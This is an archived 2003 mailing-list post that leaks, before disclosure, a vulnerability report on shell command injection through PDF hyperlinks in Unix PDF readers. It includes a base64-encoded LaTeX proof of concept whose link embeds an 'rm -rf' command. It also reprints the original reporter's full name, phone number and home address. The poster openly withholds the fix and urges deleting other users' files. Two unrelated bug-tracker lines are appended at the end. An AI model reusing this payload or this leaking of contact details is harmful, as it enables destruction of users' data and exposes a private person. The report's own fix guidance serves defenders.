[Full-Disclosure] -10Day CERT Advisory on PDF Files hack4life@hushmail.com hack4life@hushmail.com Fri, 13 Jun 2003 14:24:50 -0700 Previous message: [Full-Disclosure] /Claimed/ remote root exploit in Pureftpd Next message: [Full-Disclosure] [SECURITY] [DSA-320-1] New mikmod packages fix buffer overflow Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] --Hush_boundary-3eea41229a621 Content-type: text/plain -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi Hackers Ok, so I've been a bit quiet recently, what with college and exams. But the semesters nearly over now so I'll have plenty of time to keep you all up to date with what those fools at CERT are up to once college is finished. Anyway, on with the show, here we have a nice little hole allowing you to execute shell commands by embedding them in PDF files. Obviously no one's likely to be reading PDF's as root on a production server, but nice for rm'ing those ankle biting Linux lusers. You'll also some example code. There was also some example code for mapping untrusted URIs to a safer format, but I'm not releasing that, we're here to *HACK* boxes not to Patch them! You'll also notice that this takes the format of the form used to report holes to CERT rather than my usual draft advisory format. If you want to wait for the actual CERT advisory (probably with out details of how to exploit it) they will be releasing it on Monday 23rd June 2003, making my release -10 Day! Hack4Life #####NOT FOR PUBLIC DISTRIBUTION##### CONTACT INFORMATION Let us know who you are: Name: Martyn Gilmore E-mail: gilmore@floraxion.com Phone / fax: 513-374-1586 Affiliation and address: 1068 Archland Drive, Cincinnati, OH 45224 Have you reported this to the vendor? [yes/no] no Please describe the vulnerability. Valid PDF files can contain malicious external-type hyperlinks that can execute arbitrary shell commands underneath Unix with various PDF viewers/readers. The hyperlinks must be activated or followed for the malicious script to run. The obvious case is for a user to click on one. The PDF viewers/readers, which are known to be vulnerable at this time, appear to spawn (exec) the associated external program handlers with "sh -c". "sh -c <registered-program> <embedded-hyperlink>" What is the impact of this vulnerability? - - - ---------------------------------------- (For example: local user can gain root/privileged access, intruders can create root-owned files, denial of service attack, etc.) a) What is the specific impact: Under probable conditions, arbitrary Unix shell commands can be executed with the PDF reader/viewer user's privileges when malicious hyperlinks are activated. b) How would you envision it being used in an attack scenario: Many are possible (especially if the user has more privileges). I don't know, if there are any real restrictions on the embedded shell script's length. To your knowledge is the vulnerability currently being exploited? - - - ---------------------------------------------------------------- [yes/no] no If there is an exploitation script available, please include it here. - - - ----------------------------------------------------------------- - --- Attachment evil.pdf contains the embedded command `rm -rf $HOME/monkey` Preconditions: 1. User's home directory does NOT contain a file or directory named 'monkey' 2. Run 'touch $HOME/monkey' 3. Adobe Acrobat 5.06 on Redhat 8.0 only performs the "sh -c" type of action when there is no current running browser/email program (i.e. mozilla). Exploit: Open PDF file and click on gilmore@floraxion.com hyperlink Proof of exploit: Absence of $HOME/monkey With the help of pdflatex, the attachment evil.tex is the source document for evil.pdf. Other "flexible" PDF authoring solutions probably would work too. Do you know what systems and/or configurations are vulnerable? - - - ------------------------------------------------------------- [yes/no] (If yes, please list them below) System : PDF viewers/readers, which spawn external programs with "sh -c" to handle certain types of hyperlinks. OS version : Most Unix versions Verified/Guessed: Guessed (beyond what I report below) I've only verified the following programs on Redhat Linux 8.0. Xpdf 1.01 Adobe Acrobat Reader 5.06 Xpdf executes the malicious embedded script, regardless of whether the handler is currently running or not. The Ghostview derivative on my machine, doesn't have hyperlinks enabled (ignores that aspect of the PDF file). Others readers maybe affected as well. Are you aware of any workarounds and/or fixes for this vulnerability? - - - ----------------------------------------------------------------- - --- [yes/no] (If you have a workaround or are aware of patches please include the information here.) I'm aware of no fixes in any PDF readers/viewers. Each program's implementation may differ (languages, dynamic memory libraries) to prevent a universal fix, however suggested guidelines are given below. These guidelines are an attempt to offer a robust solution with a minimal effect on existing behavior. If the "sh -c" type of invocation is a necessary way to spawn external browser/email program(s), then the embedded hyperlink should be properly quoted/escaped. The "sh -c" type of invocation maybe desirable to allow, the configuration of the external programs to contain environmental variables. i.e. "sh -c $USER_BROWSER args" The easiest solution (IMHO) underneath these types of scenarios is to enclose the embedded hyperlink within single quotes (avoids escaping the entire Unix shell meta-character soup). In addition, any single quotes found within the original embedded hyperlink, should be replaced with '"'"' (i.e. "\'\"\'\"\'" for C/C++ programs). Programs will have to deal correctly with possibilities of unknown-length string expansion or risk overwrites of the heap or stack; use of std::string or RWCString in C++ would simplify the design, if they are available. Testing will require conditions to trigger the "sh -c" type of invocation (i.e. browser/email program not running) for each PDF reader/viewer. 1.) Hyperlinks with embedded shell exploits will not be executed. 2.) Proper email addresses such as "Martyn%20Gilmore<gilmore@floraxion.com>" and "gilmore@floraxion.com(Martyn%20Gilmore)" should now work as "mailto:" targets. These legitimate uses are how the exploit was discovered, since some Unix shell meta-characters are present and prevent positive functionality from occurring. Caveats/Notes: The solution above is a result of correcting the direct actions of the PDF viewer/reader against misuse. The user configurable spawned programs are trusted to not eval their arguments further, otherwise the original exploit returns. The potential security breach of additional evals is the onus of the configured handler or the end-user (not having a secured environment or not having an responsible entrusted handler). Clarification of initial report: Besides the potential for explicit "sh -c" in an exec*() Unix system calls, the C StdLib system() call performs one implicitly. Better Proposed Fix: I think that my first proposed fixed was too naive.? Mozilla 1.3 has a shell wrapper that calls eval.? Other configured browers/handlers could have the same problem or could easily introduce one, even if unintentional (check-in of a developer copy). Granted the programs I originally cited as guilty parties execute the malicious code first, however they are only the first in a potential chain. Rather than trying to correct the whole round trip (more programs), it is more feasible for PDF viewer/reader party to make sure their "Untrusted URIs" don't have immediate or long-term potential for problems.? The effort is about the same as the original suggestion. I've attached a small example C++ program that maps untrusted URIs to a safer format, which is a far better alternative to the Unix-based quoting that only lasts one round and has potential to pass the buck. -----BEGIN PGP SIGNATURE----- Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 2.3 Charset: UTF8 wkYEARECAAYFAj7qQNQACgkQgSjHzuae7+okUQCfWQfknodvOKkIMHWuxEtei0QgTfEA njzg8owJH9nYZ1KTKun+/eey3Wgn =1m0Y -----END PGP SIGNATURE----- --Hush_boundary-3eea41229a621 Content-type: application/octet-stream; name="evil.tex.uu" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="evil.tex.uu" XGRvY3VtZW50Y2xhc3NbbWFyZ2luLGxpbmUsMTFwdF17cmVzfQpcdXNlcGFja2FnZXt0aW1lc30K XHVzZXBhY2thZ2V7Y29sb3J9Clx1c2VwYWNrYWdlW3VybGNvbG9yPWJsdWUsY29sb3JsaW5rcz10 cnVlLHBkZnBhZ2Vtb2RlPW5vbmUscGRmc3RhcnR2aWV3PUZpdEhde2h5cGVycmVmfQpcZGVmXENw bHVzcGx1c3t7XHJtIENccmFpc2UuMWV4XGhib3h7XHNtYWxsICsrfX19CgolICdzdCcgJ25kJyAn cmQnICd0aCcgc3VwZXJzY3JpcHRzIGZvciBudW1iZXJzClxkZWZcZmlyc3R7e1xyYWlzZS41ZXhc aGJveHtcc21hbGwgc3R9fX0KXGRlZlxzZWNvbmR7e1xyYWlzZS41ZXhcaGJveHtcc21hbGwgbmR9 fX0KXGRlZlx0aGlyZHt7XHJhaXNlLjVleFxoYm94e1xzbWFsbCByZH19fQpcZGVmXGZvdXJ0aHt7 XHJhaXNlLjVleFxoYm94e1xzbWFsbCB0aH19fQoKJXVzZSBvbmx5IGEgYml0IG1vcmUgcGFnZSB0 aGFuIGRlZmF1bHQKXGFkZHRvbGVuZ3Roe1xvZGRzaWRlbWFyZ2lufXstMC4zNWlufQpcYWRkdG9s ZW5ndGh7XHZvZmZzZXR9ey0wLjUwaW59ClxhZGR0b2xlbmd0aHtcdGV4dHdpZHRofXswLjcwaW59 ClxhZGR0b2xlbmd0aHtcdGV4dGhlaWdodH17MS43MGlufQoKJW15IG5hbWUgZm9ybWF0ClxyZW5l d2NvbW1hbmR7XG5hbWVmb250fXtcTEFSR0VcZW1waFx0ZXh0c2Z9ClxuZXdjb21tYW5ke1xtZ2J1 bGxldH17XGVuc3VyZW1hdGh7XGJ1bGxldH19ClxuZXdjb21tYW5ke1xyZXNzcGFjZX17XHZzcGFj ZXsybW19fQpcbmV3Y29tbWFuZHtcSnRvRUV9e0oyRUV9ClxuZXdjb21tYW5ke1xmb3VyR0x9ezRH TH0KClxiZWdpbntkb2N1bWVudH0KICAKCiAgIFxuYW1le01hcnR5biBHaWxtb3JlfQogICBcYWRk cmVzc3tcYmVnaW57dGFidWxhcn17QHt9bHJAe319CiAgICAgICAgICAgICg1MTMpIDM3NC0xNTg2 ICYgMTA2OCBBcmNobGFuZCBEcml2ZSBcXAogICAgICAgICAgICBcaHJlZnttYWlsdG86Z2lsbW9y ZUBmbG9yYXhpb24uY29tYHJtIC1yZiBeXjI0SE9NRS9tb25rZXlgfXtcdGV4dHR0e2dpbG1vcmVA ZmxvcmF4aW9uLmNvbX19ICYgQ2luY2lubmF0aSwgT0ggNDUyMjQgXFxcCiAgICAgICAgICAgIFxl bmR7dGFidWxhcn19CgoKXGJlZ2lue3Jlc3VtZX0KCiAgICBcc2VjdGlvbntPYmplY3RpdmV9CiAg ICAgICAgRGVzaWduIGFuZCBkZXZlbG9wIEVudGVycHJpc2UgQXBwbGljYXRpb25zIHVzaW5nIGN1 cnJlbnQgdGVjaG5vbG9naWVzIGFuZCBtZXRob2RvbG9naWVzCgogICAgXHNlY3Rpb257RWR1Y2F0 aW9ufQogICAgICAgICAgICBcYmVnaW57dGFidWxhcn17QHt9bH0KICAgICAgICAgICAgT2hpbyBT dGF0ZSBVbml2ZXJzaXR5IChDb2x1bWJ1cywgT2hpbyBKdW5lIDE5OTQpIFxcCiAgICAgICAgICAg IEJTIGluIENvbXB1dGVyIEluZm9ybWF0aW9uIFNjaWVuY2Ugd2l0aCBNYXRoZW1hdGljcyBtaW5v ciBcXAogICAgICAgICAgICBDSVMgbWFqb3IgR1BBIG9mIDMuODEvNC4wMCBhbmQgb3ZlcmFsbCBH UEEgb2YgMy4wMC80LjAwCiAgICAgICAgICAgIFxlbmR7dGFidWxhcn0KCiAgICBcc2VjdGlvbntM YW5ndWFnZXMgXCYgU29mdHdhcmV9CgpcQ3BsdXNwbHVzLCBKYXZhLCBDT1JCQSwgWE1MLCBET00s IFhTTFQsIFBML1NRTCwgU1FMLCBQZXJsLCBLb3JuIFNoZWxsLCBQeXRob24sIFNBUywgQ1ZTLFxs aW5lYnJlYWsgVU1MLCBSVVAsIEpCdWlsZGVyLCBBbnQsIE1pY3Jvc29mdCBWaXN1YWwgU3R1ZGlv LCBNYWtlLCBQcm9DLCBQSFAsIFRDTC9USy9FeHBlY3QsXGxpbmVicmVhayBBcGFjaGUsIEhUTUws IENTUywgWm9wZSwgVU5JWCBBZG1pbmlzdHJhdGlvbiBhbmQgREJBKE9yYWNsZSBhbmQgSW5mb3Jt aXgpCgogICAgXHNlY3Rpb257V29yayBFeHBlcmllbmNlfQoKICAgICAgICBcYmVnaW57Zm9ybWF0 fQogICAgICAgICAgXGVtcGxveWVye2x9XHRpdGxle3J9XFwKICAgICAgICAgIFxsb2NhdGlvbnts fVxkYXRlc3tyfVxcCiAgICAgICAgICBcYm9keVxcCiAgICAgICAgXGVuZHtmb3JtYXR9CgogICAg ICAgIFxlbXBsb3llcntcdGV4dGJme1Byb2Zlc3Npb25hbCBDb21wdXRlciBDb25zdWx0YW50c319 ICAgCiAgICAgICAgXHRpdGxle1xlbXBoe0NvbXB1dGVyIENvbnN1bHRhbnR9fQogICAgICAgIFxs b2NhdGlvbntDaW5jaW5uYXRpLCBPSH0KICAgICAgICBcZGF0ZXN7XHRleHRiZntTZXB0LiAxOTk5 IC0tIFByZXNlbnR9fQogICAgICAgIFxiZWdpbntwb3NpdGlvbn0KICAgICAgICAgICAgXGJlZ2lu e3RhYnVsYXJ9e0B7fWx9CiAgICAgICAgICAgIFxcCiAgICAgICAgICAgIEFzc2lnbmVkIGF0IENv bnZlcmd5cyAoOS85OSAtLSA2LzAyKSBcXAogICAgICAgICAgICBSZXNwb25zaWJpbGl0aWVzIGlu Y2x1ZGVkOgogICAgICAgICAgICBcZW5ke3RhYnVsYXJ9CiAgICAgICAgICAgIFxyZXNzcGFjZQog ICAgICAgICAgICAgIFxiZWdpbntpdGVtaXplfQogICAgICAgICAgICAgICAgXGl0ZW1bXG1nYnVs bGV0XSAKICAgICAgICAgICAgICAgICAgICBPUkFDTEU6IGRlc2lnbmVkIGFuZCBpbXBsZW1lbnRl ZCBBZHZhbmNlZCBRdWV1ZSBhcmNoaXRlY3R1cmUgCiAgICAgICAgICAgICAgICAgICAgZm9yIDNH IHJhdGluZyBzeXN0ZW0KICAgICAgICAgICAgICAgIFxpdGVtW1xtZ2J1bGxldF0gCiAgICAgICAg ICAgICAgICAgICAgQkVBIFdMRSAoVHV4ZWRvIGFuZCBDT1JCQSk6IGRldmVsb3BlZCBhbmQKICAg ICAgICAgICAgICAgICAgICBtYWludGFpbmVkIFxDcGx1c3BsdXNcIDMtdGllciBhcHBsaWNhdGlv biAKICAgICAgICAgICAgICAgICAgICBzZXJ2ZXJzIHVzaW5nIFJvZ3VlV2F2ZSBjbGFzc2VzCiAg ICAgICAgICAgICAgICBcaXRlbVtcbWdidWxsZXRdIAogICAgICAgICAgICAgICAgICAgIFVuaXg6 IHdyb3RlIGJhY2tncm91bmQgZGFlbW9ucyB1c2luZyBzeXN0ZW0gCiAgICAgICAgICAgICAgICAg ICAgY2FsbHMgZm9yIGFzeW5jaHJvbm91cyBwcm9jZXNzaW5nCiAgICAgICAgICAgICAgICBcaXRl bVtcbWdidWxsZXRdIAogICAgICAgICAgICAgICAgICAgIEphdmE6IG1haW50YWluZWQgYW5kIGVu aGFuY2VkIFNlcnZsZXRzCiAgICAgICAgICAgICAgICBcaXRlbVtcbWdidWxsZXRdIAogICAgICAg ICAgICAgICAgICAgIFhNTDogdXRpbGl6ZWQgXENwbHVzcGx1c1wgRE9NIGFuZCBYU0xUIAogICAg ICAgICAgICAgICAgICAgIGNsYXNzZXMgZm9yIG1lc3NhZ2UgcHJvY2Vzc2luZwogICAgICAgICAg ICAgICAgXGl0ZW1bXG1nYnVsbGV0XSAKICAgICAgICAgICAgICAgICAgICBKYXZhIFN3aW5nOiBh dXRvbWF0ZWQgdGVzdGluZyBhcHBsaWNhdGlvbiAKICAgICAgICAgICAgICAgICAgICB2aWEgQ09S QkEgSURMIHBhcnNlci9BU1QgdHJhdmVyc2FsCiAgICAgICAgICAgICAgICBcaXRlbVtcbWdidWxs ZXRdIAogICAgICAgICAgICAgICAgICAgIEdyZWF0IENpcmNsZS9QdXJpZnk6IGludGVncmF0ZWQg bWVtb3J5IGRldGVjdGlvbiAKICAgICAgICAgICAgICAgICAgICB0b29scyBpbnRvIGRldmVsb3Bt ZW50IHByb2Nlc3MKICAgICAgICAgICAgICAgIFxpdGVtW1xtZ2J1bGxldF0gCiAgICAgICAgICAg ICAgICAgICAgUGVybCBEQkkvUHl0aG9uOiB3cm90ZSBzY3JpcHRzIGZvciBwcm9kdWN0aW9uCiAg ICAgICAgICAgICAgICAgICAgYW5kIGRldmVsb3BtZW50IGVudmlyb25tZW50cwogICAgICAgICAg ICAgICAgXGl0ZW1bXG1nYnVsbGV0XSAKICAgICAgICAgICAgICAgICAgICBQZXJmb3JtYW5jZSB0 dW5pbmc6IG9wdGltaXplZCB2aWV3cyBhbmQKICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlv biBzZXJ2ZXIgcGVyZm9ybWFuY2UKICAgICAgICAgICAgICAgIFxpdGVtW1xtZ2J1bGxldF0gCiAg ICAgICAgICAgICAgICAgICAgUHJvZHVjdGlvbiBhbmQgYnVpbGQgc3VwcG9ydDogdHJvdWJsZXNo b3QgCiAgICAgICAgICAgICAgICAgICAgbWFqb3IgcHJvYmxlbXMgd2l0aGluIGJ1c2luZXNzIHVu aXQKICAgICAgICAgICAgICBcZW5ke2l0ZW1pemV9CiAgICAgICAgXGVuZHtwb3NpdGlvbn0KCiAg ICAgICAgXGVtcGxveWVye1x0ZXh0YmZ7Q2FyZGluYWwgU29sdXRpb25zfX0gICAKICAgICAgICBc dGl0bGV7XGVtcGh7U29mdHdhcmUgQ29uc3VsdGFudH19CiAgICAgICAgXGxvY2F0aW9ue0NpbmNp bm5hdGksIE9IfQogICAgICAgIFxkYXRlc3tcdGV4dGJme0p1bmUgMTk5NyAtLSBTZXB0LiAxOTk5 fX0KICAgICAgICBcYmVnaW57cG9zaXRpb259CiAgICAgICAgICAgIFxiZWdpbnt0YWJ1bGFyfXtA e31sfQogICAgICAgICAgICBcXAogICAgICAgICAgICBBc3NpZ25lZCBhdCBTRFJDICg2Lzk3IC0t IDkvOTkpIFxcIAogICAgICAgICAgICBSZXNwb25zaWJpbGl0aWVzIGluY2x1ZGVkOiBcXAogICAg ICAgICAgICBcZW5ke3RhYnVsYXJ9CiAgICAgICAgICAgIFxyZXNzcGFjZQogICAgICAgICAgICAg IFxiZWdpbntpdGVtaXplfQogICAgICAgICAgICAgICAgXGl0ZW1bXG1nYnVsbGV0XQogICAgICAg ICAgICAgICAgICAgIE9SQUNMRTogY29uc3RydWN0ZWQgY29udmVyc2lvbiBwcm9ncmFtcyB1c2lu ZyBTUUxMb2FkZXIsIAogICAgICAgICAgICAgICAgICAgIFBML1NRTCAoYnVpbHQtaW4gcGFja2Fn ZXMpLCBhbmQgUHJvQyAKICAgICAgICAgICAgICAgIFxpdGVtW1xtZ2J1bGxldF0KICAgICAgICAg ICAgICAgICAgICBcQ3BsdXNwbHVzL0M6IGRlc2lnbmVkIGFuZCBkZXZlbG9wZWQgbmV3IGFwcGxp Y2F0aW9ucyBhbmQgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbWFpbnRhaW5l ZCBsaWJyYXJpZXMKICAgICAgICAgICAgICAgIFxpdGVtW1xtZ2J1bGxldF0KICAgICAgICAgICAg ICAgICAgICBDT1JCQTogZGVidWdnZWQgYW5kIGV4dGVuZGVkIGZ1bmN0aW9uYWxpdHkgb2YgCiAg ICAgICAgICAgICAgICAgICAgZXhpc3RpbmcgYXBwbGljYXRpb25zCiAgICAgICAgICAgICAgICBc aXRlbVtcbWdidWxsZXRdCiAgICAgICAgICAgICAgICAgICAgSmF2YS9KQnVpbGRlcjogcHJvdG90 eXBlZCBuZXcgaW50ZXJmYWNlcyB3aXRoIAogICAgICAgICAgICAgICAgICAgIE9yYWNsZSBiYWNr ZW5kCiAgICAgICAgICAgICAgICBcaXRlbVtcbWdidWxsZXRdCiAgICAgICAgICAgICAgICAgICAg UGVybC9Lb3JuOiB3cm90ZSB0ZXN0IGhhcm5lc3NlcyBhbmQgb3RoZXIgCiAgICAgICAgICAgICAg ICAgICAgc2NyaXB0cwogICAgICAgICAgICAgICAgXGl0ZW1bXG1nYnVsbGV0XQogICAgICAgICAg ICAgICAgICAgIEFwYWNoZS9QSFAzOiByYW4gd2ViIHNlcnZlciB3aXRoIGZvcm1zIHRvIGNhcHR1 cmUgCiAgICAgICAgICAgICAgICAgICAgZGV2ZWxvcG1lbnQgaW5mb3JtYXRpb24KICAgICAgICAg ICAgICAgIFxpdGVtW1xtZ2J1bGxldF0KICAgICAgICAgICAgICAgICAgICBUQ0wvVEs6IHByb3Zp ZGVkIGNyb3NzLXBsYXRmb3JtIFVJIG9uIGZpcnN0IHByb2plY3QKICAgICAgICAgICAgICAgICAg ICB3aGljaCBpbnRlZ3JhdGVkIHdpdGggQy9cQ3BsdXNwbHVzXCBsaWJyYXJpZXMKICAgICAgICAg ICAgICAgIFxpdGVtW1xtZ2J1bGxldF0KICAgICAgICAgICAgICAgICAgICBBSVgsIE5ULCBTb2xh cmlzLCBIUC1VWCBhbmQgSVJJWCAoU0dJKTogcmVzb2x2ZWQKICAgICAgICAgICAgICAgICAgICBh bnkgcG9ydGFiaWxpdHkgaXNzdWVzIHdpdGggY29kZSwgM1x0aGlyZFwgcGFydHkgdG9vbHMsCiAg ICAgICAgICAgICAgICAgICAgYW5kIGVudmlyb25tZW50cwogICAgICAgICAgICAgIFxlbmR7aXRl bWl6ZX0KICAgICAgICBcZW5ke3Bvc2l0aW9ufQoKICAgICAgICBcZW1wbG95ZXJ7XHRleHRiZntG aWRlbGl0eSBJbnZlc3RtZW50c319ICAgCiAgICAgICAgXHRpdGxle1xlbXBoe1Byb2R1Y3Rpb24g U2VydmljZXMgVGVjaG5pY2FsIFNwZWNpYWxpc3R9fQogICAgICAgIFxsb2NhdGlvbntDb3Zpbmd0 b24vSGVicm9uLCBLWX0KICAgICAgICBcZGF0ZXN7XHRleHRiZntPY3QuIDE5OTUgLS0gTWF5IDE5 OTd9fQogICAgICAgIFxiZWdpbntwb3NpdGlvbn0KICAgICAgICAgICAgXGJlZ2lue3RhYnVsYXJ9 e0B7fWx9CiAgICAgICAgICAgIFxcCiAgICAgICAgICAgIFJlc3BvbnNpYmlsaXRpZXMgaW5jbHVk ZWQ6CiAgICAgICAgICAgIFxlbmR7dGFidWxhcn0KICAgICAgICAgICAgXHJlc3NwYWNlCiAgICAg ICAgICAgICAgXGJlZ2lue2l0ZW1pemV9CiAgICAgICAgICAgICAgICBcaXRlbVtcbWdidWxsZXRd CiAgICAgICAgICAgICAgICAgICAgT3JhY2xlIERCQTogcGxhbm5lZCBtb25pdG9yaW5nL3BlcmZv cm1hbmNlIHNjcmlwdHMsIAogICAgICAgICAgICAgICAgICAgIGRpc2svdGFibGVzcGFjZS9leHRl bnQgbGF5b3V0LCBhbmQgaW5zdGFuY2UgaW5pdGlhbGl6YXRpb24KICAgICAgICAgICAgICAgIFxp dGVtW1xtZ2J1bGxldF0KICAgICAgICAgICAgICAgICAgICBJbmZvcm1peCBEQkE6IHNldHVwIGFu ZCBhZG1pbmlzdGVyZWQgb3ZlciAxNiBpbnN0YW5jZXMgCiAgICAgICAgICAgICAgICAgICAgb24g ZGlmZmVyZW50IHNlcnZlcnMuICBIZWxwZWQgdHVuZSwgZGVidWcgRXNxbCwgCiAgICAgICAgICAg ICAgICAgICAgUG93ZXJidWlsZGVyLCBhbmQgVkIgYXBwbGljYXRpb25zCiAgICAgICAgICAgICAg ICBcaXRlbVtcbWdidWxsZXRdCiAgICAgICAgICAgICAgICAgICAgUGVybC9Lb3JuIFNoZWxsOiB3 cm90ZSBzY3JpcHRzIGZvciBVbml4LCAKICAgICAgICAgICAgICAgICAgICBEYXRhYmFzZSBBZG1p bmlzdHJhdGlvbiwgYW5kIEFwcGxpY2F0aW9uIEludGVncmF0aW9uIHRhc2tzCiAgICAgICAgICAg ICAgICBcaXRlbVtcbWdidWxsZXRdCiAgICAgICAgICAgICAgICAgICAgVENML1RLL0V4cGVjdDog ZGV2ZWxvcGVkIGFuZCBleHRlbmRlZCBncmFwaGljYWwgCiAgICAgICAgICAgICAgICAgICAgc2Vy dmVyIG1vbml0b3IKICAgICAgICAgICAgICAgIFxpdGVtW1xtZ2J1bGxldF0KICAgICAgICAgICAg ICAgICAgICBTb2xhcmlzL0hQLVVYOiBvdmVyc2F3IFVuaXggYWRtaW5pc3RyYXRpb24sIGRhdGFi YXNlIAogICAgICAgICAgICAgICAgICAgIHNlcnZlcnMsIGFuZCB1c2VyIGVudmlyb25tZW50cwog ICAgICAgICAgICAgICAgXGl0ZW1bXG1nYnVsbGV0XQogICAgICAgICAgICAgICAgICAgIEZpbGVO ZXQ6IHJlc29sdmVkIHByb2R1Y3Rpb24gaXNzdWVzIHdpdGggCiAgICAgICAgICAgICAgICAgICAg ZGlzdHJpYnV0ZWQgaW1hZ2luZy93b3JrZmxvdyBhcHBsaWNhdGlvbnMKICAgICAgICAgICAgICAg IFxpdGVtW1xtZ2J1bGxldF0KICAgICAgICAgICAgICAgICAgICBUcmFpbmluZzogZGV2aXNlZCBh bmQgY29uc3RydWN0ZWQgYW4gZW52aXJvbm1lbnQgCiAgICAgICAgICAgICAgICAgICAgdGhhdCBh bGxvd2VkIGVuZCB1c2VycyB0byBsb2FkIGRpZmZlcmVudCAKICAgICAgICAgICAgICAgICAgICBk YXRhYmFzZSBzY2VuYXJpb3MKICAgICAgICAgICAgICBcZW5ke2l0ZW1pemV9CiAgICAgICAgXGVu ZHtwb3NpdGlvbn0KCgogICAgICAgIFxlbXBsb3llcntcdGV4dGJme1BoYXJtYWNpYX19ICAgCiAg ICAgICAgXHRpdGxle1xlbXBoe0p1bmlvciBQcm9ncmFtbWVyfX0KICAgICAgICBcbG9jYXRpb257 Q29sdW1idXMsIE9IfQogICAgICAgIFxkYXRlc3tcdGV4dGJme1NlcHQuIDE5OTQgLS0gU2VwdC4g MTk5NX19CiAgICAgICAgXGJlZ2lue3Bvc2l0aW9ufQogICAgICAgICAgICBcYmVnaW57dGFidWxh cn17QHt9bH0KICAgICAgICAgICAgXFwKICAgICAgICAgICAgUmVzcG9uc2liaWxpdGllcyBpbmNs dWRlZDoKICAgICAgICAgICAgXGVuZHt0YWJ1bGFyfQogICAgICAgICAgICBccmVzc3BhY2UKICAg ICAgICAgICAgICBcYmVnaW57aXRlbWl6ZX0KICAgICAgICAgICAgICAgIFxpdGVtW1xtZ2J1bGxl dF0KICAgICAgICAgICAgICAgICAgICBcZm91ckdMOiBwcm9kdWNlZCBkYXRhIGxpc3RpbmdzIGFu ZCBzdGF0aXN0aWNhbCAKICAgICAgICAgICAgICAgICAgICByZXBvcnRzIHRoYXQgYWNjZXNzZWQg bXVsdGlwbGUgZGF0YWJhc2VzCiAgICAgICAgICAgICAgICBcaXRlbVtcbWdidWxsZXRdCiAgICAg ICAgICAgICAgICAgICAgRGF0YSBTY3J1YmJpbmc6IHdyb3RlIGRhdGFiYXNlIHNlbWFudGljIGNo ZWNrcyB0byBwcm92aWRlIGhpbnRzIAogICAgICAgICAgICAgICAgICAgIGZvciBkYXRhIGNoYW5n ZSByZXF1ZXN0cyBvbiBwYXRpZW50IGNsaW5pY2FsIGZvcm1zCiAgICAgICAgICAgICAgICBcaXRl bVtcbWdidWxsZXRdCiAgICAgICAgICAgICAgICAgICAgU1FMOiBzdXBwbGVtZW50ZWQgYW5kIHZl cmlmaWVkIFxmb3VyR0xcIHJlcG9ydHMgd2l0aCBhZC1ob2MgaW5mb3JtYXRpb24KICAgICAgICAg ICAgICAgIFxpdGVtW1xtZ2J1bGxldF0KICAgICAgICAgICAgICAgICAgICBTQVM6IGxvYWRlZCBk YXRhc2V0cywgY3JlYXRlZCByZXBvcnRzIGFuZCBjcmVhdGVkIGR1bXBzCiAgICAgICAgICAgICAg ICBcaXRlbVtcbWdidWxsZXRdCiAgICAgICAgICAgICAgICAgICAgVk1TOiB1dGlsaXplZCBhcyBl bmQgdXNlciBhbmQgcHJvZ3JhbW1pbmcgZW52aXJvbm1lbnQKICAgICAgICAgICAgICBcZW5ke2l0 ZW1pemV9CiAgICAgICAgXGVuZHtwb3NpdGlvbn0KCiAgIFxzZWN0aW9ue1JlZmVyZW5jZXN9CiAg ICAgIEF2YWlsYWJsZSB1cG9uIHJlcXVlc3QKClxlbmR7cmVzdW1lfQpcZW5ke2RvY3VtZW50fQoK --Hush_boundary-3eea41229a621 Content-type: text/plain; name="evil.tex.uu.sig" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="evil.tex.uu.sig" LS0tLS1CRUdJTiBQR1AgU0lHTkFUVVJFLS0tLS0NCk5vdGU6IFRoaXMgc2lnbmF0dXJlIGNhbiBi ZSB2ZXJpZmllZCBhdCBodHRwczovL3d3dy5odXNodG9vbHMuY29tL3ZlcmlmeQ0KVmVyc2lvbjog SHVzaCAyLjMNCkNoYXJzZXQ6IFVURjgNCg0Kd2tZRUFCRUNBQVlGQWo3cVFKTUFDZ2tRZ1NqSHp1 YWU3K29ZVlFDZmJiS2VJYTVMQk1kU2VZbVBGWWd5MENsRWM2OEENCm9Mc2JCWGhFUXp4ZmVybXlz bjZqT3pwWVZtK1oNCj1XRGxrDQotLS0tLUVORCBQR1AgU0lHTkFUVVJFLS0tLS0NCg== --Hush_boundary-3eea41229a621-- Concerned about your privacy? Follow this link to get FREE encrypted email: https://www.hushmail.com/?l=2 Free, ultra-private instant messaging with Hush Messenger https://www.hushmail.com/services.php?subloc=messenger&l=434 Big $$$ to be made with the HushMail Affiliate Program: https://www.hushmail.com/about.php?subloc=affiliate&l=427 Previous message: [Full-Disclosure] /Claimed/ remote root exploit in Pureftpd Next message: [Full-Disclosure] [SECURITY] [DSA-320-1] New mikmod packages fix buffer overflow Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
*** Bug 23046 has been marked as a duplicate of this bug. ***
glsa sent